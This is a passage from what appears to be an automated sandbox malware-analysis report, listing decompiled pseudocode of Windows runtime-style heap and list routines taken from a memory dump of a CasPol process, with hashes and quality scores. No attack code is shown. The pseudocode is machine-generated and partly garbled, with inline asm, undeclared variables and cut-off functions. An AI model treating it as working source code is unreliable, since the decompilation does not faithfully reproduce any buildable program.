                                                                  				char _v12;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _t17;
                                                                  				intOrPtr _t26;
                                                                  				void* _t35;
                                                                  				void* _t38;
                                                                  				void* _t41;
                                                                  				intOrPtr _t44;
                                                                  
                                                                  				_t17 =  *0x14e84c4; // 0x0
                                                                  				_v12 = 1;
                                                                  				_v8 =  *0x14e84c0 * 0x4c;
                                                                  				_t41 = __ecx;
                                                                  				_t35 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x14e84c0 * 0x4c);
                                                                  				if(_t35 == 0) {
                                                                  					_t44 = 0xc0000017;
                                                                  				} else {
                                                                  					_push( &_v8);
                                                                  					_push(_v8);
                                                                  					_push(_t35);
                                                                  					_push(4);
                                                                  					_push( &_v12);
                                                                  					_push(0x6b);
                                                                  					_t44 = E0143AA90();
                                                                  					_v20 = _t44;
                                                                  					if(_t44 >= 0) {
                                                                  						E0143FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x14e84c0 * 0xc);
                                                                  						_t38 = _t35;
                                                                  						if(_t35 < _v8 + _t35) {
                                                                  							do {
                                                                  								asm("movsd");
                                                                  								asm("movsd");
                                                                  								asm("movsd");
                                                                  								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                  							} while (_t38 < _v8 + _t35);
                                                                  							_t44 = _v20;
                                                                  						}
                                                                  					}
                                                                  					_t26 =  *0x14e84c4; // 0x0
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                  				}
                                                                  				return _t44;
                                                                  			}













                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6799e3fbe4fe246c7f1b69db1f3fdb10d4aea7c246db1a43ad0c84d7fe63aa73
                                                                  • Instruction ID: ba791b3a159b8749bf9c3df2e0052f3ed92bdebd0b132feb6690f9b4f1100bf5
                                                                  • Opcode Fuzzy Hash: 6799e3fbe4fe246c7f1b69db1f3fdb10d4aea7c246db1a43ad0c84d7fe63aa73
                                                                  • Instruction Fuzzy Hash: C721C272A00119AFDB11DF59CE81F6ABBBDFB54308F1501A9E608AB262D375ED41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 54%
                                                                  			E0142B390(void* __ecx, intOrPtr _a4) {
                                                                  				signed int _v8;
                                                                  				signed char _t12;
                                                                  				signed int _t16;
                                                                  				signed int _t21;
                                                                  				void* _t28;
                                                                  				signed int _t30;
                                                                  				signed int _t36;
                                                                  				signed int _t41;
                                                                  
                                                                  				_push(__ecx);
                                                                  				_t41 = _a4 + 0xffffffb8;
                                                                  				E01412280(_t12, 0x14e8608);
                                                                  				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                  				asm("sbb edi, edi");
                                                                  				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                  				_v8 = _t36;
                                                                  				asm("lock cmpxchg [ebx], ecx");
                                                                  				_t30 = 1;
                                                                  				if(1 != 1) {
                                                                  					while(1) {
                                                                  						_t21 = _t30 & 0x00000006;
                                                                  						_t16 = _t30;
                                                                  						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                  						asm("lock cmpxchg [edi], esi");
                                                                  						if(_t16 == _t30) {
                                                                  							break;
                                                                  						}
                                                                  						_t30 = _t16;
                                                                  					}
                                                                  					_t36 = _v8;
                                                                  					if(_t21 == 2) {
                                                                  						_t16 = E014300C2(0x14e8608, 0, _t28);
                                                                  					}
                                                                  				}
                                                                  				if(_t36 != 0) {
                                                                  					_t16 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                  				}
                                                                  				return _t16;
                                                                  			}












                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b98abe779d87b058a1701ff3b1c1db71b400d9f3f8a5485a4a9a374ba07ae12
                                                                  • Instruction ID: e0a96bca3a660650f791d73e320b2c758d1190017884981bf62bd99ab8f6fba4
                                                                  • Opcode Fuzzy Hash: 5b98abe779d87b058a1701ff3b1c1db71b400d9f3f8a5485a4a9a374ba07ae12
                                                                  • Instruction Fuzzy Hash: D31148333011219BCB2A8A298D81A6B739AEBD5230B34412FDD16D73B0CA71AC42C695
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E013F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                  				intOrPtr _t33;
                                                                  				intOrPtr _t37;
                                                                  				intOrPtr _t41;
                                                                  				intOrPtr* _t46;
                                                                  				void* _t48;
                                                                  				intOrPtr _t50;
                                                                  				intOrPtr* _t60;
                                                                  				void* _t61;
                                                                  				intOrPtr _t62;
                                                                  				intOrPtr _t65;
                                                                  				void* _t66;
                                                                  				void* _t68;
                                                                  
                                                                  				_push(0xc);
                                                                  				_push(0x14cf708);
                                                                  				E0144D08C(__ebx, __edi, __esi);
                                                                  				_t65 = __ecx;
                                                                  				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                  				if( *(__ecx + 0x24) != 0) {
                                                                  					_push( *(__ecx + 0x24));
                                                                  					E014395D0();
                                                                  					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                  				}
                                                                  				L6();
                                                                  				L6();
                                                                  				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                  				E014395D0();
                                                                  				_t33 =  *0x14e84c4; // 0x0
                                                                  				L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                  				_t37 =  *0x14e84c4; // 0x0
                                                                  				L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                  				_t41 =  *0x14e84c4; // 0x0
                                                                  				E01412280(L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x14e86b4);
                                                                  				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                  				_t46 = _t65 + 0xe8;
                                                                  				_t62 =  *_t46;
                                                                  				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                  				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                  					_t61 = 3;
                                                                  					asm("int 0x29");
                                                                  					_push(_t65);
                                                                  					_t66 = _t61;
                                                                  					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                  					_push( *_t23);
                                                                  					E014395D0();
                                                                  					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                  					_push( *_t24);
                                                                  					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                  					_t48 = E014395D0();
                                                                  					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                  					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                  					return _t48;
                                                                  				} else {
                                                                  					 *_t60 = _t62;
                                                                  					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                  					 *(_t68 - 4) = 0xfffffffe;
                                                                  					E013F9325();
                                                                  					_t50 =  *0x14e84c4; // 0x0
                                                                  					return E0144D0D1(L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                  				}
                                                                  			}
















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 163fa4f7a9ffa117d98950af399857fd1f83d069cf6a211b13c0898b491e3646
                                                                  • Instruction ID: 59874f404da3e11ce18a95bf2d7b1fef2738fdb3f68e608325ccdefef8d4206f
                                                                  • Opcode Fuzzy Hash: 163fa4f7a9ffa117d98950af399857fd1f83d069cf6a211b13c0898b491e3646
                                                                  • Instruction Fuzzy Hash: 06212872041602DFC722EF69CA40F59B7F9FF28708F1445AEA1598B6B2DB35E941CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E01484257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                  				intOrPtr* _t18;
                                                                  				intOrPtr _t24;
                                                                  				intOrPtr* _t27;
                                                                  				intOrPtr* _t30;
                                                                  				intOrPtr* _t31;
                                                                  				intOrPtr _t33;
                                                                  				intOrPtr* _t34;
                                                                  				intOrPtr* _t35;
                                                                  				void* _t37;
                                                                  				void* _t38;
                                                                  				void* _t39;
                                                                  				void* _t43;
                                                                  
                                                                  				_t39 = __eflags;
                                                                  				_t35 = __edi;
                                                                  				_push(8);
                                                                  				_push(0x14d08d0);
                                                                  				E0144D08C(__ebx, __edi, __esi);
                                                                  				_t37 = __ecx;
                                                                  				E014841E8(__ebx, __edi, __ecx, _t39);
                                                                  				L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                  				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                  				_t18 = _t37 + 8;
                                                                  				_t33 =  *_t18;
                                                                  				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                  				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                  					L8:
                                                                  					_push(3);
                                                                  					asm("int 0x29");
                                                                  				} else {
                                                                  					 *_t27 = _t33;
                                                                  					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                  					_t35 = 0x14e87e4;
                                                                  					_t18 =  *0x14e87e0; // 0x0
                                                                  					while(_t18 != 0) {
                                                                  						_t43 = _t18 -  *0x14e5cd0; // 0xffffffff
                                                                  						if(_t43 >= 0) {
                                                                  							_t31 =  *0x14e87e4; // 0x0
                                                                  							_t18 =  *_t31;
                                                                  							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                  								goto L8;
                                                                  							} else {
                                                                  								 *0x14e87e4 = _t18;
                                                                  								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                  								L013F7055(_t31 + 0xfffffff8);
                                                                  								_t24 =  *0x14e87e0; // 0x0
                                                                  								_t18 = _t24 - 1;
                                                                  								 *0x14e87e0 = _t18;
                                                                  								continue;
                                                                  							}
                                                                  						}
                                                                  						goto L9;
                                                                  					}
                                                                  				}
                                                                  				L9:
                                                                  				__eflags =  *0x14e5cd0;
                                                                  				if( *0x14e5cd0 <= 0) {
                                                                  					L013F7055(_t37);
                                                                  				} else {
                                                                  					_t30 = _t37 + 8;
                                                                  					_t34 =  *0x14e87e8; // 0x0
                                                                  					__eflags =  *_t34 - _t35;
                                                                  					if( *_t34 != _t35) {
                                                                  						goto L8;
                                                                  					} else {
                                                                  						 *_t30 = _t35;
                                                                  						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                  						 *_t34 = _t30;
                                                                  						 *0x14e87e8 = _t30;
                                                                  						 *0x14e87e0 = _t18 + 1;
                                                                  					}
                                                                  				}
                                                                  				 *(_t38 - 4) = 0xfffffffe;
                                                                  				return E0144D0D1(L01484320());
                                                                  			}
















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b502a4b8bec3fc9084adf3a56ccff52459d5ab447c38e7d06d801ad7b466de5
                                                                  • Instruction ID: d8f80332b8b9869bada69266722f5c0cd674c89d74de11e7cf643d3326648fe1
                                                                  • Opcode Fuzzy Hash: 6b502a4b8bec3fc9084adf3a56ccff52459d5ab447c38e7d06d801ad7b466de5
                                                                  • Instruction Fuzzy Hash: 20215874A40607CFCB25EF69D500B19BBE1FB95398B28826FD1058F3BADB319491CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 25%
                                                                  			E01422397(intOrPtr _a4) {
                                                                  				void* __ebx;
                                                                  				void* __ecx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* __ebp;
                                                                  				signed int _t11;
                                                                  				void* _t19;
                                                                  				void* _t25;
                                                                  				void* _t26;
                                                                  				intOrPtr _t27;
                                                                  				void* _t28;
                                                                  				void* _t29;
                                                                  
                                                                  				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                  				if( *0x14e848c != 0) {
                                                                  					L0141FAD0(0x14e8610);
                                                                  					if( *0x14e848c == 0) {
                                                                  						E0141FA00(0x14e8610, _t19, _t27, 0x14e8610);
                                                                  						goto L1;
                                                                  					} else {
                                                                  						_push(0);
                                                                  						_push(_a4);
                                                                  						_t26 = 4;
                                                                  						_t29 = L01422581(0x14e8610, 0x13d50a0, _t26, _t27, _t28);
                                                                  						E0141FA00(0x14e8610, 0x13d50a0, _t27, 0x14e8610);
                                                                  					}
                                                                  				} else {
                                                                  					L1:
                                                                  					_t11 =  *0x14e8614; // 0x0
                                                                  					if(_t11 == 0) {
                                                                  						_t11 = E01434886(0x13d1088, 1, 0x14e8614);
                                                                  					}
                                                                  					_push(0);
                                                                  					_push(_a4);
                                                                  					_t25 = 4;
                                                                  					_t29 = L01422581(0x14e8610, (_t11 << 4) + 0x13d5070, _t25, _t27, _t28);
                                                                  				}
                                                                  				if(_t29 != 0) {
                                                                  					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                  					 *((char*)(_t29 + 0x40)) = 0;
                                                                  				}
                                                                  				return _t29;
                                                                  			}
















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c34901056f31433e12fbc4e48a9ddc894700daea856dacb55031c54a8defabb
                                                                  • Instruction ID: 50675a7faf466caf8fd434145954580177961da168b493627903a0999fd5aa7b
                                                                  • Opcode Fuzzy Hash: 7c34901056f31433e12fbc4e48a9ddc894700daea856dacb55031c54a8defabb
                                                                  • Instruction Fuzzy Hash: 3E112B3274431267EB30AA3AAC40F16B6D8FB70651F54852FF60ADB271D6F4D889C754
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 42%
                                                                  			E013FC962(char __ecx) {
                                                                  				signed int _v8;
                                                                  				intOrPtr _v12;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t19;
                                                                  				char _t22;
                                                                  				void* _t26;
                                                                  				void* _t27;
                                                                  				char _t32;
                                                                  				char _t34;
                                                                  				void* _t35;
                                                                  				void* _t37;
                                                                  				intOrPtr* _t38;
                                                                  				signed int _t39;
                                                                  
                                                                  				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                  				_v8 =  *0x14ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                  				_t34 = __ecx;
                                                                  				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                  					_t26 = 0;
                                                                  					L0140EEF0(0x14e70a0);
                                                                  					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                  					if(L0147F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                  						L9:
                                                                  						E0140EB70(_t29, 0x14e70a0);
                                                                  						_t19 = _t26;
                                                                  						L2:
                                                                  						_pop(_t35);
                                                                  						_pop(_t37);
                                                                  						_pop(_t27);
                                                                  						return L0143B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                  					}
                                                                  					_t29 = _t34;
                                                                  					_t26 = E0147F1FC(_t34, _t32);
                                                                  					if(_t26 < 0) {
                                                                  						goto L9;
                                                                  					}
                                                                  					_t38 =  *0x14e70c0; // 0x0
                                                                  					while(_t38 != 0x14e70c0) {
                                                                  						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                  						_t38 =  *_t38;
                                                                  						_v12 = _t22;
                                                                  						if(_t22 != 0) {
                                                                  							_t29 = _t22;
                                                                  							 *0x14eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                  							_v12();
                                                                  						}
                                                                  					}
                                                                  					goto L9;
                                                                  				}
                                                                  				_t19 = 0;
                                                                  				goto L2;
                                                                  			}



















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 886ae8aa4f50730714a237eee0883f3853dc0de0a5e0eefa9fae5ba8dd7ba574
                                                                  • Instruction ID: 5f9913fd39d658e3c08210dd9a349bf65a3769d741dc53e1621ecf7cee2f0e18
                                                                  • Opcode Fuzzy Hash: 886ae8aa4f50730714a237eee0883f3853dc0de0a5e0eefa9fae5ba8dd7ba574
                                                                  • Instruction Fuzzy Hash: 251125313006069BC711AF2EDC44A2BBBE9FF9422AB10053EE94587676DB30ED10C7D2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0142002D() {
                                                                  				void* _t11;
                                                                  				char* _t14;
                                                                  				signed char* _t16;
                                                                  				char* _t27;
                                                                  				signed char* _t29;
                                                                  
                                                                  				_t11 = E01417D50();
                                                                  				_t27 = 0x7ffe0384;
                                                                  				if(_t11 != 0) {
                                                                  					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                  				} else {
                                                                  					_t14 = 0x7ffe0384;
                                                                  				}
                                                                  				_t29 = 0x7ffe0385;
                                                                  				if( *_t14 != 0) {
                                                                  					if(E01417D50() == 0) {
                                                                  						_t16 = 0x7ffe0385;
                                                                  					} else {
                                                                  						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                  					}
                                                                  					if(( *_t16 & 0x00000040) != 0) {
                                                                  						goto L18;
                                                                  					} else {
                                                                  						goto L3;
                                                                  					}
                                                                  				} else {
                                                                  					L3:
                                                                  					if(E01417D50() != 0) {
                                                                  						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                  					}
                                                                  					if( *_t27 != 0) {
                                                                  						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                  							goto L5;
                                                                  						}
                                                                  						if(E01417D50() != 0) {
                                                                  							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                  						}
                                                                  						if(( *_t29 & 0x00000020) == 0) {
                                                                  							goto L5;
                                                                  						}
                                                                  						L18:
                                                                  						return 1;
                                                                  					} else {
                                                                  						L5:
                                                                  						return 0;
                                                                  					}
                                                                  				}
                                                                  			}









                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                  • Instruction ID: 701b81856938e58603c76defffa30d3e9b36c0faee6fab5c1f69f6ced92d955f
                                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                  • Instruction Fuzzy Hash: 4B11E5726016918FEB238B2DD544B363BE8EB41B58F0D00A2ED04977B2D33CC882C661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 69%
                                                                  			E013F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                  				intOrPtr* _t51;
                                                                  				intOrPtr _t59;
                                                                  				signed int _t64;
                                                                  				signed int _t67;
                                                                  				signed int* _t71;
                                                                  				signed int _t74;
                                                                  				signed int _t77;
                                                                  				signed int _t82;
                                                                  				intOrPtr* _t84;
                                                                  				void* _t85;
                                                                  				intOrPtr* _t87;
                                                                  				void* _t94;
                                                                  				signed int _t95;
                                                                  				intOrPtr* _t97;
                                                                  				signed int _t99;
                                                                  				signed int _t102;
                                                                  				void* _t104;
                                                                  
                                                                  				_push(__ebx);
                                                                  				_push(__esi);
                                                                  				_push(__edi);
                                                                  				_t97 = __ecx;
                                                                  				_t102 =  *(__ecx + 0x14);
                                                                  				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                  					_t102 = _t102 | 0x000007d0;
                                                                  				}
                                                                  				_t48 =  *[fs:0x30];
                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                  					_t102 = _t102 & 0xff000000;
                                                                  				}
                                                                  				_t80 = 0x14e85ec;
                                                                  				E01412280(_t48, 0x14e85ec);
                                                                  				_t51 =  *_t97 + 8;
                                                                  				if( *_t51 != 0) {
                                                                  					L6:
                                                                  					return L0140FFB0(_t80, _t97, _t80);
                                                                  				} else {
                                                                  					 *(_t97 + 0x14) = _t102;
                                                                  					_t84 =  *0x14e538c; // 0x77e46828
                                                                  					if( *_t84 != 0x14e5388) {
                                                                  						_t85 = 3;
                                                                  						asm("int 0x29");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						_push(0x2c);
                                                                  						_push(0x14cf6e8);
                                                                  						E0144D0E8(0x14e85ec, _t97, _t102);
                                                                  						 *((char*)(_t104 - 0x1d)) = 0;
                                                                  						_t99 =  *(_t104 + 8);
                                                                  						__eflags = _t99;
                                                                  						if(_t99 == 0) {
                                                                  							L13:
                                                                  							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                  							if(__eflags == 0) {
                                                                  								E014C88F5(_t80, _t85, 0x14e5388, _t99, _t102, __eflags);
                                                                  							}
                                                                  						} else {
                                                                  							__eflags = _t99 -  *0x14e86c0; // 0xf907b0
                                                                  							if(__eflags == 0) {
                                                                  								goto L13;
                                                                  							} else {
                                                                  								__eflags = _t99 -  *0x14e86b8; // 0x0
                                                                  								if(__eflags == 0) {
                                                                  									goto L13;
                                                                  								} else {
                                                                  									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                  									__eflags =  *((char*)(_t59 + 0x28));
                                                                  									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                  										E01412280(_t99 + 0xe0, _t99 + 0xe0);
                                                                  										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                  										__eflags =  *((char*)(_t99 + 0xe5));
                                                                  										if(__eflags != 0) {
                                                                  											E014C88F5(0x14e85ec, _t85, 0x14e5388, _t99, _t102, __eflags);
                                                                  										} else {
                                                                  											__eflags =  *((char*)(_t99 + 0xe4));
                                                                  											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                  												 *((char*)(_t99 + 0xe4)) = 1;
                                                                  												_push(_t99);
                                                                  												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                  												L0143AFD0();
                                                                  											}
                                                                  											while(1) {
                                                                  												_t71 = _t99 + 8;
                                                                  												 *(_t104 - 0x2c) = _t71;
                                                                  												_t80 =  *_t71;
                                                                  												_t95 = _t71[1];
                                                                  												 *(_t104 - 0x28) = _t80;
                                                                  												 *(_t104 - 0x24) = _t95;
                                                                  												while(1) {
                                                                  													L19:
                                                                  													__eflags = _t95;
                                                                  													if(_t95 == 0) {
                                                                  														break;
                                                                  													}
                                                                  													_t102 = _t80;
                                                                  													 *(_t104 - 0x30) = _t95;
                                                                  													 *(_t104 - 0x24) = _t95 - 1;
                                                                  													asm("lock cmpxchg8b [edi]");
                                                                  													_t80 = _t102;
                                                                  													 *(_t104 - 0x28) = _t80;
                                                                  													 *(_t104 - 0x24) = _t95;
                                                                  													__eflags = _t80 - _t102;
                                                                  													_t99 =  *(_t104 + 8);
                                                                  													if(_t80 != _t102) {
                                                                  														continue;
                                                                  													} else {
                                                                  														__eflags = _t95 -  *(_t104 - 0x30);
                                                                  														if(_t95 !=  *(_t104 - 0x30)) {
                                                                  															continue;
                                                                  														} else {
                                                                  															__eflags = _t95;
                                                                  															if(_t95 != 0) {
                                                                  																_t74 = 0;
                                                                  																 *(_t104 - 0x34) = 0;
                                                                  																_t102 = 0;
                                                                  																__eflags = 0;
                                                                  																while(1) {
                                                                  																	 *(_t104 - 0x3c) = _t102;
                                                                  																	__eflags = _t102 - 3;
                                                                  																	if(_t102 >= 3) {
                                                                  																		break;
                                                                  																	}
                                                                  																	__eflags = _t74;
                                                                  																	if(_t74 != 0) {
                                                                  																		L49:
                                                                  																		_t102 =  *_t74;
                                                                  																		__eflags = _t102;
                                                                  																		if(_t102 != 0) {
                                                                  																			_t102 =  *(_t102 + 4);
                                                                  																			__eflags = _t102;
                                                                  																			if(_t102 != 0) {
                                                                  																				 *0x14eb1e0(_t74, _t99);
                                                                  																				 *_t102();
                                                                  																			}
                                                                  																		}
                                                                  																		do {
                                                                  																			_t71 = _t99 + 8;
                                                                  																			 *(_t104 - 0x2c) = _t71;
                                                                  																			_t80 =  *_t71;
                                                                  																			_t95 = _t71[1];
                                                                  																			 *(_t104 - 0x28) = _t80;
                                                                  																			 *(_t104 - 0x24) = _t95;
                                                                  																			goto L19;
                                                                  																		} while (_t74 == 0);
                                                                  																		goto L49;
                                                                  																	} else {
                                                                  																		_t82 = 0;
                                                                  																		__eflags = 0;
                                                                  																		while(1) {
                                                                  																			 *(_t104 - 0x38) = _t82;
                                                                  																			__eflags = _t82 -  *0x14e84c0;
                                                                  																			if(_t82 >=  *0x14e84c0) {
                                                                  																				break;
                                                                  																			}
                                                                  																			__eflags = _t74;
                                                                  																			if(_t74 == 0) {
                                                                  																				_t77 = E014C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                  																				__eflags = _t77;
                                                                  																				if(_t77 == 0) {
                                                                  																					_t74 = 0;
                                                                  																					__eflags = 0;
                                                                  																				} else {
                                                                  																					_t74 = _t77 + 0xfffffff4;
                                                                  																				}
                                                                  																				 *(_t104 - 0x34) = _t74;
                                                                  																				_t82 = _t82 + 1;
                                                                  																				continue;
                                                                  																			}
                                                                  																			break;
                                                                  																		}
                                                                  																		_t102 = _t102 + 1;
                                                                  																		continue;
                                                                  																	}
                                                                  																	goto L20;
                                                                  																}
                                                                  																__eflags = _t74;
                                                                  															}
                                                                  														}
                                                                  													}
                                                                  													break;
                                                                  												}
                                                                  												L20:
                                                                  												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                  												 *((char*)(_t99 + 0xe5)) = 1;
                                                                  												 *((char*)(_t104 - 0x1d)) = 1;
                                                                  												goto L21;
                                                                  											}
                                                                  										}
                                                                  										L21:
                                                                  										 *(_t104 - 4) = 0xfffffffe;
                                                                  										E013F922A(_t99);
                                                                  										_t64 = E01417D50();
                                                                  										__eflags = _t64;
                                                                  										if(_t64 != 0) {
                                                                  											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  										} else {
                                                                  											_t67 = 0x7ffe0386;
                                                                  										}
                                                                  										__eflags =  *_t67;
                                                                  										if( *_t67 != 0) {
                                                                  											_t67 = E014C8B58(_t99);
                                                                  										}
                                                                  										__eflags =  *((char*)(_t104 - 0x1d));
                                                                  										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                  											__eflags = _t99 -  *0x14e86c0; // 0xf907b0
                                                                  											if(__eflags != 0) {
                                                                  												__eflags = _t99 -  *0x14e86b8; // 0x0
                                                                  												if(__eflags == 0) {
                                                                  													_t94 = 0x14e86bc;
                                                                  													_t87 = 0x14e86b8;
                                                                  													goto L27;
                                                                  												} else {
                                                                  													__eflags = _t67 | 0xffffffff;
                                                                  													asm("lock xadd [edi], eax");
